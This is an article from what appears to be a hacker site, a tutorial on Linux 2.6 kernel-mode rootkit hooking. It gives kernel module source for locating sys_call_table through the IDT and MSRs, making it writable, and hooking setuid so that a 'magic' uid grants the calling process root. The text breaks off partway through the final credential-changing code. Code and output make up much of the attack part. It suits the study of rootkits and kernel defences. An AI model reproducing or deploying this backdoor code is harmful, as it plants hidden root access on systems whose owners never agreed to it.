Kernel mode hooking [EN]



                Ninjas OWN Pirates :>

----+----------------------------------------------------------------------------------------------+
    |          Home           Articles           Tools           Links            About            |
----+----------------------------------------------------------------------------------------------+

,_._._._._._._._|____________________________________________________ 
|_X_X_X_X_X_X_X_|    Kernel mode hooking [EN]                       /
                !


    Kernel Mode Hooking
        - oblique 2010


    0x01] Introduction
    0x02] Kernel mode hooking basic theory
    0x03] LKM - hello kernel
    0x04] Interrupt Descriptor Table (IDT)
    0x05] Get sys_call_table - Linux x86-32
    0x06] Model-Specific Registers (MSRs)
    0x07] Get sys_call_table - Linux x86-64
    0x08] Get ia32_sys_call_table - Linux x86-64
    0x09] Map to a writable memory
    0x0A] Hook a system call
    0x0B] Other ideas/methods
    0x0C] Greets
    0x0D] References



--[ 0x01 Introduction

    In this article I will show you the basic technique that rootkits use,
    which we can use to hook system calls in kernel mode. I will deal only
    with Linux 2.6 x86-32 and Linux 2.6 x86-64. In the end we are going to
    hook the setuid system call which when takes a "magic" uid as an
    argument it will give root to the process.


--[ 0x02 Kernel mode hooking basic theory

    The modern Operating Systems that work in x86 architecture, use the
    well-known protected mode. In protected mode there are 4 different
    privilege levels, 0 to 3 (a.k.a ring0 - ring3). The highest-level (the
    least privileged) is the userland (ring3) and the lowest-level (the
    highest privileged) is the kernel mode (ring0). Applications run in
    userland and they use an interrupt to tell to the kernel which system
    call have to execute. This interrupt in Linux x86-32 is the instruction
    "int $0x80" and in Linux x86-64 is the instruction "syscall". When the
    CPU takes the interrupt, it switch from ring3 to ring0 and it calls the
    system_call. Lets see the source code for x86-32:


    arch/x86/kernel/entry_32.S from [5]

    ...
    ...

    ENTRY(system_call)
        RING0_INT_FRAME
        pushl %eax
        CFI_ADJUST_CFA_OFFSET 4
        SAVE_ALL
        GET_THREAD_INFO(%ebp)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%ebp)
        jnz syscall_trace_entry
        cmpl $(nr_syscalls), %eax
        jae syscall_badsys
    syscall_call:
        call *sys_call_table(,%eax,4)
        movl %eax,PT_EAX(%esp)
    syscall_exit:
        LOCKDEP_SYS_EXIT
        DISABLE_INTERRUPTS(CLBR_ANY)
        TRACE_IRQS_OFF
        movl TI_flags(%ebp), %ecx
        testl $_TIF_ALLWORK_MASK, %ecx
        jne syscall_exit_work

    ...
    ...


    As you can see the instruction "call *sys_call_table(,%eax,4)" calls
    the system call from a pointer array (sys_call_table) based on EAX
    value. This values can be found at /usr/include/asm/unistd_32.h (for
    x86-32) and /usr/include/asm/unistd_64.h (for x86-64).

    The same thing happens at x86-64 but there, there is one more array,
    the ia32_sys_call_table which is used in ia32_syscall. This is used for
    32bit binary emulator.

    To hook a system call we have to change its pointer from sys_call_table
    with a pointer of another function that we have create which will call
    the real pointer (if its needed). This cannot be done with a userland
    program because it doesn't have access to the kernel memory (actually
    you can, via /dev/kmem or /dev/mem), so we will use Loadable Kernel
    Module (LKM) to write kernel mode programs. Many people know LKM as a
    hardware driver which can be loaded from shell through the commands
    modprobe or insmod.  In fact LKM is a module that is loaded in kernel
    memory and after that, it becomes part of the kernel.

    In kernel 2.4 hooking is very easy because sys_call_table is exported,
    so with "extern void *sys_call_table[];" you can get it and write to
    it. Unlike 2.4, in kernel 2.6 the sys_call_table is not exported and
    after 2.6.16-rc1 is read-only. There are solutions for these 2
    problems, also there are 2 different ways to get the address of
    sys_call_table which we are going to examine later.


--[ 0x03 LKM - hello kernel

    Before I continue I will show how we can write and compile an LKM (if
    you know how to do this just skip this section). An LKM does not have
    main() but has other 2 functions. The init_module() which is called
    when we load the module and the cleanup_module() which is called when
    we (or the kernel) unload the module. The init_module() returns int, if
    the int is negative number then the module will not be loaded and an
    error is returned, if the int value is 0 then the module has been
    loaded successfully. The functions which does not take arguments must
    have void in parenthesis because of some programming style standards.
    Another standard is that with the macro MODULE_LICENSE() we have to
    declare the license of the module (more info:
    http://kerneltrap.org/node/2991).


--file: hello_kernel.c--
#include <linux/module.h>

int init_module(void) {
    printk(KERN_INFO "Hello kernel!");
    return 0;
}

void cleanup_module(void) {
    printk(KERN_INFO "Bye bye kernel!");
}

MODULE_LICENSE("GPL");
--EOF--
    
    
    In kernel 2.6 there is one more way to declare the init and cleanup
    functions and we can use any name we want.

    init function declaration:


    static int __init name_1(void) {
    }


    cleanup function declaration:


    static void __exit name_2(void) {
    }


    and then we do this:

    module_init(name_1);
    module_exit(name_2);


    A second example of hello_kernel.c:


--file: hello_kernel.c--
#include <linux/module.h>

static int __init hello_init(void) {
    printk(KERN_INFO "Hello kernel!");
    return 0;
}

static void __exit hello_exit(void) {
    printk(KERN_INFO "Bye bye kernel!");
}

module_init(hello_init);
module_exit(hello_exit);
MODULE_LICENSE("GPL");
--EOF--


    Kernel uses printk() to print a message. printk() has the same syntax
    as printf() but first we have to define the type of the message. The
    available types are: KERN_EMERG, KERN_ALERT, KERN_CRIT, KERN_ERR,
    KERN_WARNING, KERN_NOTICE, KERN_INFO, KERN_DEBUG, KERN_DEFAULT,
    KERN_CONT. To see these messages we have to run the command 'dmesg'
    (more info: 'man dmesg').

    To compile a module in kernel 2.6 we have to create a Makefile which
    should have the variable obj-m. In obj-m we have to declare the modules
    names but with .o  extension. In our case is hello_kernel.o


--file: Makefile--
obj-m = hello_kernel.o
KDIR = /lib/modules/$(shell uname -r)/build

all:
	make -C $(KDIR) M=$(PWD) modules
clean:
	make -C $(KDIR) M=$(PWD) clean
--EOF-- 
    
    (more info: Documentation/kbuild/modules.txt from [5])

    -- NOTE --
    Don't forget that the basic syntax of Makefile is:

    <target>: [ <dependency > ]*
       [ <TAB> <command> <endl> ]+

    So in 5th and 7th line we must have Tabs instead of spaces before
    "make". If you run 'make' and you got an error, check for this.
    -- END OF NOTE --

    After the creation of Makefile we have to run 'make' to compile the
    module.  Then we run as root 'insmod hello_kernel.ko' to load it and
    'rmmod hello_kernel' to unload it.


    oblique@gentoo ~/hello_kernel $ ls
    hello_kernel.c  Makefile
    oblique@gentoo ~/hello_kernel $ make
    make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hello_kernel modules
    make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2'
      CC [M]  /home/oblique/hello_kernel/hello_kernel.o
      Building modules, stage 2.
      MODPOST 1 modules
      CC      /home/oblique/hello_kernel/hello_kernel.mod.o
      LD [M]  /home/oblique/hello_kernel/hello_kernel.ko
    make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2'
    oblique@gentoo ~/hello_kernel $ sudo insmod hello_kernel.ko
    oblique@gentoo ~/hello_kernel $ dmesg
    ...
    ...
    [60947.072113] Hello kernel!
    oblique@gentoo ~/hello_kernel $ sudo rmmod hello_kernel
    oblique@gentoo ~/hello_kernel $ dmesg
    ...
    ...
    [60947.072113] Hello kernel!
    [61105.613280] Bye bye kernel!
    oblique@gentoo ~/hello_kernel $

 
--[ 0x04 Interrupt Descriptor Table (IDT)

    IDT is a table in x86 architecture which can have up to 256 entries for
    3 gate types (task gate, interrupt gate, trap gate). The "int $0x80" is
    interrupt gate. This table actually is stored in kernel memory and the
    kernel just loads its address to IDT Register (IDTR) with the
    instruction LIDT. We can read this register using the instruction SIDT
    which takes as destination operand a memory address. IDTR structure is:


    x86-32:

    BYTES   NAMES
    2       limit
    4       base


    x86-64:
    
    BYTES   NAMES
    2       limit
    8       base


    base is the address where the IDT stars and by adding the limit to it,
    we will get the table's last memory address. We can express ITDR with
    this C struct:


    struct idtr {
        unsigned short limit;
        void *base;
    } __attribute__ ((packed));


    -- NOTE --
    The "__attribute__ ((packed));" tells the gcc to use the minimum amount
    of memory required by the chosen type. In other words it will create a
    struct that is exactly the bytes we want.
    -- END OF NOTE --

    Now we know that IDT address is base and has 3 gates. The descriptor of
    IDT has this strcture:


    x86-32:

    BYTES   NAMES
    2       offset low bits (0..15)
    2       segment selector
    1       zero
    1       type & flags
    2       offset high bits (16..31)

    
    struct idt_descriptor {
        unsigned short offset_low;
        unsigned short selector;
        unsigned char zero;
        unsigned char type_flags;
        unsigned short offset_high;
    } __attribute__ ((packed));


    In type_flags there is the type of gate with same flags. From this
    struct we will only need offset_low and offset_high. To get the offset
    we have to write the following:

    offset = (offset_high<<16) | offset_low


    x86-64:

    BYTES   NAMES
    2       offset low bits (0..15)
    2       segment selector
    1       zero
    1       type & flags
    2       offset middle bits (16..31)
    4       offset high bits (32..63)
    4       zero

    struct idt_descriptor {
        unsigned short offset_low;
        unsigned short selector;
        unsigned char zero1;
        unsigned char type_flags;
        unsigned short offset_middle;
        unsigned int offset_high;
        unsigned int zero2;
    } __attribute__ ((packed));

    Only  offset_low, offset_middle and offset_high are needed here.  Code
    below gets the offset:

    offset = (offset_high<<32) | (offset_middle<<16) | offset_low


--[ 0x05 Get sys_call_table - Linux x86-32

    There are 2 ways to obtain the sys_call_table: 1) from some files
    (/boot/System.map-(kernel_version), vmlinux, /proc/kallsyms) but maybe
    these files doesn't even exist. 2) from IDT descriptor of interrupt
    0x80.


    Method 1:

    oblique@gentoo ~ $ grep sys_call_table /boot/System.map-`uname -r`
    c1582160 R sys_call_table
    oblique@gentoo ~ $ nm /usr/src/linux/vmlinux | grep sys_call_table
    c1582160 R sys_call_table
    oblique@gentoo ~ $ grep sys_call_table /proc/kallsyms 
    oblique@gentoo ~ $ grep system_call /proc/kallsyms 
    c157fac4 T system_call

    -- NOTE --
    /usr/src/linux is the path of your kernel source. Also the addresses we
    got differ from system to system.
    -- END OF NOTE --


    As we can see with the first 2 commands we got the address of
    sys_call_table. File /proc/kallsyms doesn't contain it, but has the
    system_call. Lets check system_call with gdb.


    oblique@gentoo ~ $ gdb -q /usr/src/linux/vmlinux
    Reading symbols from /usr/src/linux-2.6.34-zen1-r2/vmlinux...done.
    (gdb) x/30i 0xc157fac4
    0xc157fac4:     push   %eax
    0xc157fac5:     cld    
    0xc157fac6:     push   $0x0
    0xc157fac8:     push   %fs
    0xc157faca:     push   %es
    0xc157facb:     push   %ds
    0xc157facc:     push   %eax
    0xc157facd:     push   %ebp
    0xc157face:     push   %edi
    0xc157facf:     push   %esi
    0xc157fad0:     push   %edx
    0xc157fad1:     push   %ecx
    0xc157fad2:     push   %ebx
    0xc157fad3:     mov    $0x7b,%edx
    0xc157fad8:     mov    %edx,%ds
    0xc157fada:     mov    %edx,%es
    0xc157fadc:     mov    $0xd8,%edx
    0xc157fae1:     mov    %edx,%fs
    0xc157fae3:     mov    $0xffffe000,%ebp
    0xc157fae8:     and    %esp,%ebp
    0xc157faea:     testl  $0x100001d1,0x8(%ebp)
    0xc157faf1:     jne    0xc157fbd8
    0xc157faf7:     cmp    $0x152,%eax
    0xc157fafc:     jae    0xc157fc21
    0xc157fb02:     call   *-0x3ea7dea0(,%eax,4)
    0xc157fb09:     mov    %eax,0x18(%esp)
    0xc157fb0d:     cli    
    0xc157fb0e:     mov    0x8(%ebp),%ecx
    0xc157fb11:     test   $0x1000feff,%ecx
    0xc157fb17:     jne    0xc157fbf8


    Here we can see the first 30 instructions of system_call (0xc157fac4).
    As I have shown before, there is a call that executes the system call
    from sys_call_table. This call is at address 0xc157fb02 and the next
    instruction is at 0xc157fb09. So 0xc157fb09 - 0xc157fb02 = 7 bytes.


    (gdb) x/7xb 0xc157fb02
    0xc157fb02:     0xff    0x14    0x85    0x60    0x21    0x58    0xc1


    The first 3 bytes are the opcodes of the instruction and the address of
    sys_call_table follows.


    (gdb) x/xw 0xc157fb02 + 3
    0xc157fb05:     0xc1582160
    

    So now we found the address of sys_call_table. I will not implement
    this method because I prefer the second.


    Method 2:

    As you should already know the interrupts are inside IDT. When we call
    the instruction "int $0x80" the CPU goes to the IDT and takes the IDT
    descriptor of interrupt 0x80 and then it jumps to the offset
    representing the address of system_call. So from the offset we can
    search for the pattern 0xff 0x14 0x85 and when we find it the next 4
    bytes is the address of sys_call_table.


--file: get_sct.c--
#include <linux/module.h>

struct idt_descriptor {
    unsigned short offset_low;
    unsigned short selector;
    unsigned char zero;
    unsigned char type_flags;
    unsigned short offset_high;
} __attribute__ ((packed));

struct idtr {
    unsigned short limit;
    void *base;
} __attribute__ ((packed));


void *get_sys_call_table(void) {
    struct idtr idtr;
    struct idt_descriptor idtd;
    void *system_call;
    unsigned char *ptr;
    int i;

    asm volatile("sidt %0" : "=m"(idtr));

    memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));

    system_call = (void*)((idtd.offset_high<<16) | idtd.offset_low);

    printk(KERN_INFO "system_call: 0x%p", system_call);

    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
            return *((void**)(ptr+3));
        ptr++;
    }

    return NULL;
}

static int __init sct_init(void) {
    printk(KERN_INFO "sys_call_table: 0x%p", get_sys_call_table());
    return 0;
}

static void __exit sct_exit(void) {
}

module_init(sct_init);
module_exit(sct_exit);
MODULE_LICENSE("GPL");
--EOF--


    Explanation:
    
    asm volatile("sidt %0" : "=m"(idtr));
    memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));

    Here we get the IDTR and then with 'base + 0x80*sizeof(idtd)' we read
    the IDT descriptor of interrupt 0x80.


    system_call = (void*)((idtd.offset_high<<16) | idtd.offset_low);
    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
            return *((void**)(ptr+3));
        ptr++;
    }

    Here we calculate the address of system_call and then with loop we
    check for the pattern. After we find it we add 3 and we return what the
    new address holds.


    oblique@gentoo ~/hooking $ make
    make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hooking modules
    make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2'
      CC [M]  /home/oblique/hooking/get_sct.o
      Building modules, stage 2.
      MODPOST 1 modules
      CC      /home/oblique/hooking/get_sct.mod.o
      LD [M]  /home/oblique/hooking/get_sct.ko
    make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2'
    oblique@gentoo ~/hooking $ sudo insmod get_sct.ko 
    oblique@gentoo ~/hooking $ dmesg | tail
    ...
    ...
    [70274.087185] system_call: 0xc157fac4
    [70274.087190] sys_call_table: 0xc1582160
    oblique@gentoo ~/hooking $ sudo rmmod get_sct


--[ 0x06 Model-Specific Registers (MSRs)

    MSRs are registers that are used for very specific CPU jobs. To write
    to MSRs we use the instruction WRMSR and to read we use the instruction
    RDMSR. These 2 instructions use 3 registers: EDX, EAX, ECX. ECX should
    carry the value of the MSR we want to use. MSRs are 64bit registers, we
    use EDX for the high bits and EAX for the low bits. The values that we
    put in ECX can be found at [8].


--[ 0x07 Get sys_call_table - Linux x86-64

    Instruction SYSCALL is used to call x86-64 system calls and it uses the
    IA32_LSTAR MSR. According to [8] the IA32_LSTAR value is 0xc0000082.
    The IA32_LSTAR MSR in fact holds the address of system_call.


    arch/x86/kernel/entry_64.S from [5]

    ...
    ...

    ENTRY(system_call)
            CFI_STARTPROC   simple
            CFI_SIGNAL_FRAME
            CFI_DEF_CFA     rsp,KERNEL_STACK_OFFSET
            CFI_REGISTER    rip,rcx
            SWAPGS_UNSAFE_STACK
    ENTRY(system_call_after_swapgs)
            movq    %rsp,PER_CPU_VAR(old_rsp)
            movq    PER_CPU_VAR(kernel_stack),%rsp
            ENABLE_INTERRUPTS(CLBR_NONE)
            SAVE_ARGS 8,1
            movq  %rax,ORIG_RAX-ARGOFFSET(%rsp)
            movq  %rcx,RIP-ARGOFFSET(%rsp)
            CFI_REL_OFFSET rip,RIP-ARGOFFSET
            GET_THREAD_INFO(%rcx)
            testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%rcx)
            jnz tracesys
    system_call_fastpath:
            cmpq $__NR_syscall_max,%rax
            ja badsys
            movq %r10,%rcx
            call *sys_call_table(,%rax,8)
            movq %rax,RAX-ARGOFFSET(%rsp)
    ret_from_sys_call:

    ...
    ...


    The "call *sys_call_table(,%rax,8)" calls the system call. Lets see
    system_call in gdb.


    oblique@sandbox64:~$ grep sys_call_table /boot/System.map-`uname -r`
    ffffffff81544380 R sys_call_table
    ffffffff8154dff8 r ia32_sys_call_table
    oblique@sandbox64:~$ grep system_call /boot/System.map-`uname -r`
    ffffffff81012060 T system_call
    ffffffff81012070 T system_call_after_swapgs
    ffffffff810120dc t system_call_fastpath
    oblique@sandbox64:~$ gdb -q /usr/src/linux/vmlinux
    Reading symbols from /usr/src/linux-2.6.32/vmlinux...done.
    (gdb) x/30i 0xffffffff81012060
    0xffffffff81012060:  swapgs 
    0xffffffff81012063:  data32 data32 data32 nopw %cs:0x0(%rax,%rax,1)
    0xffffffff81012070:  mov    %rsp,%gs:0xc6c8
    0xffffffff81012079:  mov    %gs:0xcbc8,%rsp
    0xffffffff81012082:  push   %rax
    0xffffffff81012083:  callq  *0x790a0f(%rip)        # 0xffffffff817a2a98
    0xffffffff81012089:  pop    %rax
    0xffffffff8101208a:  sub    $0x50,%rsp
    0xffffffff8101208e:  mov    %rdi,0x40(%rsp)
    0xffffffff81012093:  mov    %rsi,0x38(%rsp)
    0xffffffff81012098:  mov    %rdx,0x30(%rsp)
    0xffffffff8101209d:  mov    %rax,0x20(%rsp)
    0xffffffff810120a2:  mov    %r8,0x18(%rsp)
    0xffffffff810120a7:  mov    %r9,0x10(%rsp)
    0xffffffff810120ac:  mov    %r10,0x8(%rsp)
    0xffffffff810120b1:  mov    %r11,(%rsp)
    0xffffffff810120b5:  mov    %rax,0x48(%rsp)
    0xffffffff810120ba:  mov    %rcx,0x50(%rsp)
    0xffffffff810120bf:  mov    %gs:0xcbc8,%rcx
    0xffffffff810120c8:  sub    $0x1fd8,%rcx
    0xffffffff810120cf:  testl  $0x100001d1,0x10(%rcx)
    0xffffffff810120d6:  jne    0xffffffff8101222c
    0xffffffff810120dc:  cmp    $0x12a,%rax
    0xffffffff810120e2:  ja     0xffffffff810121b6
    0xffffffff810120e8:  mov    %r10,%rcx
    0xffffffff810120eb:  callq  *-0x7eabbc80(,%rax,8)
    0xffffffff810120f2:  mov    %rax,0x20(%rsp)
    0xffffffff810120f7:  mov    $0x1000feff,%edi
    0xffffffff810120fc:  mov    %gs:0xcbc8,%rcx
    0xffffffff81012105:  sub    $0x1fd8,%rcx

    
    The instruction that we looking for is at 0xffffffff810120eb and it's 7
    bytes.


    (gdb) x/7xb 0xffffffff810120eb
    0xffffffff810120eb:     0xff    0x14    0xc5    0x80    0x43    0x54    0x81
    (gdb) x/xw 0xffffffff810120eb + 3
    0xffffffff810120ee:     0x81544380


    As you can see we have the sys_call_table address but it needs
    0xffffffff as high bits. The pattern that we are looking for is not the
    same as x86-32, now the pattern is 0xff 0x14 0xc5.


--file: get_sct64.c--
#include <linux/module.h>

#define IA32_LSTAR  0xc0000082

void *get_sys_call_table(void) {
    void *system_call;
    unsigned char *ptr;
    int i, low, high;

    asm("rdmsr" : "=a" (low), "=d" (high) : "c" (IA32_LSTAR));

    system_call = (void*)(((long)high<<32) | low);

    printk(KERN_INFO "system_call: 0x%p", system_call);

    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*)(0xffffffff00000000 | *((unsigned int*)(ptr+3)));
        ptr++;
    }

    return NULL;
}

static int __init sct_init(void) {
    printk(KERN_INFO "sys_call_table: 0x%p", get_sys_call_table());
    return 0;
}

static void __exit sct_exit(void) {
}

module_init(sct_init);
module_exit(sct_exit);
MODULE_LICENSE("GPL");
--EOF--
    

    oblique@sandbox64:~/hooking$ sudo insmod get_sct641.ko 
    oblique@sandbox64:~/hooking$ dmesg | tail
    ...
    ...
    [ 3027.560110] system_call: 0xffffffff81012060
    [ 3027.560110] sys_call_table: 0xffffffff81544380
    oblique@sandbox64:~/hooking$ sudo rmmod get_sct641


--[ 0x08 Get ia32_sys_call_table - Linux x86-64

    x86-32 binaries as we know use interrupt 0x80 to call system calls,
    so for being the kernel able to run x86-32 binaries, kernel developers
    created the ia32_syscall which calls the system call from
    ia32_sys_call_table. As we saw above the interrupts are defined in IDT,
    so we already know the technique to get ia32_sys_call_table.
    ia32_syscall uses the "call *ia32_sys_call_table(,%rax,8)" to call a
    system call and the pattern that we are looking for is 0xff 0x14 0xc5.


--file: get_ia32_sct64.c--
#include <linux/module.h>

struct idt_descriptor {
    unsigned short offset_low;
    unsigned short selector;
    unsigned char zero1;
    unsigned char type_flags;
    unsigned short offset_middle;
    unsigned int offset_high;
    unsigned int zero2;
} __attribute__ ((packed));

struct idtr {
    unsigned short limit;
    void *base;
} __attribute__ ((packed));


void *get_ia32_sys_call_table(void) {
    struct idtr idtr;
    struct idt_descriptor idtd;
    void *ia32_syscall;
    unsigned char *ptr;
    int i;

    asm volatile("sidt %0" : "=m"(idtr));

    memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));

    ia32_syscall = (void*)(((long)idtd.offset_high<<32) | (idtd.offset_middle<<16) | idtd.offset_low);

    printk(KERN_INFO "ia32_syscall: 0x%p", ia32_syscall);

    for (ptr=ia32_syscall, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*) (0xffffffff00000000 | *((unsigned int*)(ptr+3)));
        ptr++;
    }

    return NULL;
}

static int __init sct_init(void) {
    printk(KERN_INFO "ia32_sys_call_table: 0x%p", get_ia32_sys_call_table());
    return 0;
}

static void __exit sct_exit(void) {
}

module_init(sct_init);
module_exit(sct_exit);
MODULE_LICENSE("GPL");
--EOF--


    oblique@sandbox64:~/hooking$ grep ia32_syscall /boot/System.map-`uname -r`
    ffffffff810464e0 T ia32_syscall
    ffffffff8154ea80 r ia32_syscall_end
    oblique@sandbox64:~/hooking$ grep ia32_sys_call_table /boot/System.map-`uname -r`
    ffffffff8154dff8 r ia32_sys_call_table
    oblique@sandbox64:~/hooking$ sudo insmod get_ia32_sct64.ko 
    oblique@sandbox64:~/hooking$ dmesg | tail
    ...
    ...
    [ 5786.380128] ia32_syscall: 0xffffffff810464e0
    [ 5786.380128] ia32_sys_call_table: 0xffffffff8154dff8
    oblique@sandbox64:~/hooking$ sudo rmmod get_ia32_sct64


--[ 0x09 Map to a writable memory

    As I have said in section 0x02, sys_call_table is read-only. This also
    happens for other parts of kernel memory. The solution is to use
    vmap().

    void *vmap(struct page **pages, unsigned int count,
                                unsigned long flags, pgprot_t prot);

    As we can see, vmap takes 4 arguments. The 1st argument is a pointers
    array, pointing to some 'struct page', 2nd is the number of pages, 3rd
    argument is about flags and 4th describes the memory protections.

    Virtual memory is separated into pages, sized 4096 bytes each (we can
    get that with PAGE_SIZE). If we are at the beginning of a page, the
    page address will have zero in a range from 0 to 12 bits. If we are
    not, then we can get the original address by performing a bitwise add
    operation with PAGE_MASK. To transform a virtual address to a page
    address we use virt_to_page() macro. A virtual address does belong to
    the same page with another one, only if they differ at 0..12 bits. 

    According to [6] virt_to_page() was broken at x86-64 architecture and
    it was  fixed in version 2.6.22. In this case we will need to use the
    "pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);" (addr will be the
    variable with our address).  Now, we will need some preprocessors, if
    __i386__ is defined it means that compilation takes place in a x86-32
    system, or if __x86_64__ is defined means that compilation takes place
    in a x86-64 system.  LINUX_VERSION_CODE contains the numeric value of
    kernel version, and with KERNEL_VERSION() macro we can get the value of
    any version we want, so we will need to include linux/version.h.

    For calling vmap we have to include linux/vmalloc.h and linux/mm.h.
    The 1st argument we pass consists of 2 page addresses because
    sys_call_table can be probably separated in 2 pieces, if one of its
    parts belongs to the next page.  The 3rd argument is the flag VM_MAP
    which makes vmap "understand" that we gave it an array of pages for
    mapping.  Finally, the 4th argument we pass is PAGE_KERNEL, which gives
    us the privileges for gaining writing access to memory.

    Vmap will return an address which is the beginning of the 1st page we
    asked for, and for accessing sys_call_table we need to add its offset
    to page. We can get this offset using offset_in_page() macro. Inside
    cleanup function we have to call vunmap() for un-mapping the pages.


    --function: get_writable_sct()--
    void *get_writable_sct(void *sct_addr) {
        struct page *p[2];
        void *sct;
        unsigned long addr = (unsigned long)sct_addr & PAGE_MASK;

        if (sct_addr == NULL)
            return NULL;

    #if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22) && defined(__x86_64__)
        p[0] = pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);
        p[1] = pfn_to_page(__pa_symbol(addr + PAGE_SIZE) >> PAGE_SHIFT);
    #else
        p[0] = virt_to_page(addr);
        p[1] = virt_to_page(addr + PAGE_SIZE);
    #endif
        sct = vmap(p, 2, VM_MAP, PAGE_KERNEL);
        if (sct == NULL)
            return NULL;
        return sct + offset_in_page(sct_addr);
    }
    -- END OF FUNCTION --
    
    -- EXAMPLE --
    void **sys_call_table = get_writable_sct(get_sys_call_table());
    // hook some system calls
    vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK));
    -- END OF EXAMPLE --


--[ 0x0A Hook a system call

    To hook a system call, we should first store its real address and then
    replace it with the address of the function we created. The definitions
    of system calls functions are found inside "include/linux/syscalls.h"
    [5]. As an example take a look at setuid definition:


    asmlinkage long sys_setuid(uid_t uid);


    asmlinkage is a macro which says to gcc that the arguments will be
    passed through the stack and not through registers, in case of
    optimization. In our module, we will define the following:


    asmlinkage long (*real_setuid)(uid_t uid);


    The real_setuid is a pointer to a function. After that we create our
    function that it will call the real_setuid().


    asmlinkage long hooked_setuid(uid_t uid) {
        return real_setuid(uid);
    }


    In case we include asm/unistd_32.h we are going to have system calls
    numbers for x86-32, or we can get the relevant numbers for x86-64 if we
    include asm/unistd_64.h. In older glibc versions these files were
    asm-i386/unistd.h and asm-x86_64/unistd.h. If we include asm/unistd.h,
    a preprocessor will decide which one to use. In these files, system
    calls definitions have __NR_ prefix. For example with __NR_setuid we
    will get setuid's number. For hooking setuid we should write the
    following:  


    real_setuid = sys_call_table[__NR_setuid];
    sys_call_table[__NR_setuid] = hooked_setuid;


    and while cleaning up for unhook we should do:


    sys_call_table[__NR_setuid] = real_setuid;


    When we want the module to work in both x86 architectures, we should
    use preprocessors. If CONFIG_IA32_EMULATION is defined it means that
    x86-32 system calls also work in x86-64 systems. The sys_call_table and
    the ia32_sys_call_table both contain the same addresses, but in
    different places. There is a little problem because in asm/unistd_32.h
    and asm/unistd_64.h, values have the same names, so we can't include
    them at the same time. A simple solution is to code a simple script
    which detects whether the architecture is x86-64 and copies
    asm/unistd_32.h (or asm-i386/unistd.h) in the same folder with our
    source code, as well as replacing the prefix __NR_ with __NR32_.


--file: configure.sh--
#!/bin/sh

if [ `uname -m` = x86_64 ]; then
    if [ -e /usr/include/asm/unistd_32.h ]; then
        sed -e 's/__NR_/__NR32_/g' /usr/include/asm/unistd_32.h > unistd_32.h
    else
        if [ -e /usr/include/asm-i386/unistd.h ]; then
            sed -e 's/__NR_/__NR32_/g' /usr/include/asm-i386/unistd.h > unistd_32.h
        else
            echo "asm/unistd_32.h and asm-386/unistd.h does not exist."
        fi
    fi
fi
--EOF--


    Here we should include this:


    #ifdef CONFIG_IA32_EMULATION
    #include "unistd_32.h"
    #endif


    with that we will actually hook it:


    #ifdef CONFIG_IA32_EMULATION
        ia32_sys_call_table[__NR32_setuid] = hooked_setuid;
    #endif


    and with that unhook it:

  
    #ifdef CONFIG_IA32_EMULATION
        ia32_sys_call_table[__NR32_setuid] = real_setuid;
    #endif
  

    Notice: Sometimes when they change completely the implementation of a
    system call, because the precedent was deprecated, they don't change
    the values, but they add new ones. Indeed after some version of x86-32,
    setuid exists 2 times as sys_setuid16 and sys_setuid. sys_setuid16 has
    the number of __NR_setuid and sys_setuid the number of __NR_setuid32.
    In this case if we want, we can hook both and by making use of a
    preprocessor to add some code. I am not going to implement this, but I
    will show you the case we only want to hook sys_setuid.


    hook:

    #ifdef __NR_setuid32
        real_setuid = sys_call_table[__NR_setuid32];
        sys_call_table[__NR_setuid32] = hooked_setuid;
    #else
        real_setuid = sys_call_table[__NR_setuid];
        sys_call_table[__NR_setuid] = hooked_setuid;
    #endif
    #ifdef CONFIG_IA32_EMULATION
    #ifdef __NR32_setuid32
        ia32_sys_call_table[__NR32_setuid32] = hooked_setuid;
    #else
        ia32_sys_call_table[__NR32_setuid] = hooked_setuid;
    #endif
    #endif


    unhook:
    
    #ifdef __NR_setuid32
        sys_call_table[__NR_setuid32] = real_setuid;
    #else
        sys_call_table[__NR_setuid] = real_setuid;
    #endif
    #ifdef CONFIG_IA32_EMULATION
    #ifdef __NR32_setuid32
        ia32_sys_call_table[__NR32_setuid32] = real_setuid;
    #else
        ia32_sys_call_table[__NR32_setuid] = real_setuid;
    #endif
    #endif


    Before I provide you with the whole module's source code, let's make an
    interesting modification in hooked_setuid. A nice concept is, after we
    call setuid and give as uid parameter a "magic" number, to change
    process uid and gid to 0. In other words to give process root
    privileges.

    Inside kernel exist lots of data structures that can be changed in
    future versions if vulnerabilities are discovered or if they
    implemented in a better way. One of these is 'struct task_struct' where
    a lot of information about processes can be found. This struct contains
    8 interesting variables:


    uid_t uid, euid, suid, fsuid;
    gid_t gid, egid, sgid, fsgid;


    When targeting the running process we use 'current' macro. For these 2
    we need to include linux/sched.h. For giving root privileges to a
    process we should do the following:


    current->uid = current->euid = current->suid = current->fsuid = 0;
    current->gid = current->egid = current->sgid = current->fsgid = 0;
    return 0;


    This won't be functional for kernel 2.6.29 and above because the data
    structure and the generally the method which assigns new uid and gid to
    the process has changed. In the new method a new struct exists, the
    'struct cred'. For changing uid and gid we should first call
    prepare_creds(), which returns a pointer to a newly created 'struct
    cred', and then we change the variables and we call commit_creds().
    Finally we should return its results. 


    struct cred *cred = prepare_creds();
    cred->uid = cred->suid = cred->euid = cred->fsuid = 0;
    cred->gid = cred->sgid = cred->egid = cred->fsgid = 0;
